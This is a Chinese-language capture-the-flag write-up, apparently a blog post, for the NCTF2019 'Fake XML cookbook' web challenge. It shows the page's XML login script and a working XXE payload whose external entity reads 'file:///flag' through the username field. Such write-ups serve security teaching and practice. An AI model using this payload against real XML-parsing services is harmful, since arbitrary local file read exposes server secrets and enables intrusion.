[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbook

  1. 首先我们进入页面

  1. 然后我们查看一下源码发现有这样一个代码:

    <script type='text/javascript'> 
    function doLogin(){
    	var username = $("#username").val();
    	var password = $("#password").val();
    	if(username == "" || password == ""){
    		alert("Please enter the username and password!");
    		return;
    	}
    	
    	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
        $.ajax({
            type: "POST",
            url: "doLogin.php",
            contentType: "application/xml;charset=utf-8",
            data: data,
            dataType: "xml",
            anysc: false,
            success: function (result) {
            	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
            	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
            	if(code == "0"){
            		$(".msg").text(msg + " login fail!");
            	}else if(code == "1"){
            		$(".msg").text(msg + " login success!");
            	}else{
            		$(".msg").text("error:" + msg);
            	}
            },
            error: function (XMLHttpRequest,textStatus,errorThrown) {
                $(".msg").text(errorThrown + ':' + textStatus);
            }
        }); 
    }
    </script>
    
    1. 然后看到题目XML联想到XXE漏洞

      XXE漏洞参考链接:https://xz.aliyun.com/t/6887#toc-5

      然后我们根据上面链接,直接构造payload

      利用这个payload可以进行任意本地文件读取

      flag一般在 / 目录下或者 /var/www/html/ 下,我们直接读取 / 目录下的flag

      payload:

      <?xml version="1.0" encoding="utf-8"?> 
      <!DOCTYPE xxe [
      <!ELEMENT name ANY >
      <!ENTITY penson SYSTEM "file:///flag" >       //用file协议读取
      ]>
      <user><username>&penson;</username><password>penson</password></user>
      

      最后我们得到flag:


posted @ 2021-07-09 10:52  胖三斤1  阅读(261)  评论(0编辑  收藏  举报
Live2D